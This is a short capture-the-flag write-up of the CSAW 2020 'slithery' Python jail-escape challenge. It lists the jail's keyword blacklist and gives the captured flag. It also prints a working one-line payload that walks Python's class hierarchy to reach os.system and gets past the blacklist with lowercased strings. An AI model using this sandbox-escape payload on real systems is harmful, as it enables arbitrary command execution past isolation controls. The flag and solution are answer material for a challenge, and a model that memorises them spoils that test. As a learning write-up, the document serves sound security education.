# slithery (Pwn, 100 points)

> Setting up a new coding environment for my data science students. Some of them
> are l33t h4ck3rs that got RCE and crashed my machine a few times :(. Can you
> help test this before I use it for my class? Two sandboxes should be better than
> one...
> nc pwn.chal.csaw.io 5011

FLAG = flag{y4_sl1th3r3d_0ut}

This challenge is a Python jail escape. This being the first Python jail escape I have ever tried and completed I will give a brief summary of how I completed it the unintended way.

While skimming the python script I saw a check to see if the users input was in a blacklist.

command = input(">>> ")
if any([x in command for x in blacklist.BLACKLIST]):
raise Exception("not allowed!!")

So I connected to the server and ran the following command to get all the words that were blacklisted.

['__builtins__', '__import__', 'eval', 'exec', 'import',
'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
'subprocess', 'pty', 'platform', 'open', 'read', 'write',
'dir', 'type']

At this point I knew what commands I couldn't use and got completely stuck. I looked up other python jail escape CTF challenges and came across two helpful writeups.

[Escaping Python Jails](https://anee.me/escaping-python-jails-849c65cf306e)
[Python SSTI](https://misakikata.github.io/2020/04/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B8%8ESSTI/)

It took me a lot of trial and error to finally come up with this over engineered script.

print(''.__class__.__mro__[1].__subclasses__()[109].__init__.__globals__['SYS'.lower()].modules['OS'.lower()].__dict__['SYSTEM'.lower()]('cat flag.txt'))

I did look at the server to see where the flag was and I found the intended solution in the same directory as the flag.

I learned a lot from this challenge and hopefully will complete more of these.

Original writeup (https://github.com/autun12/CTF-Writeups/tree/master/CSAWCTF2020/BinaryExploitation/slithery_COMPLETED/README.md).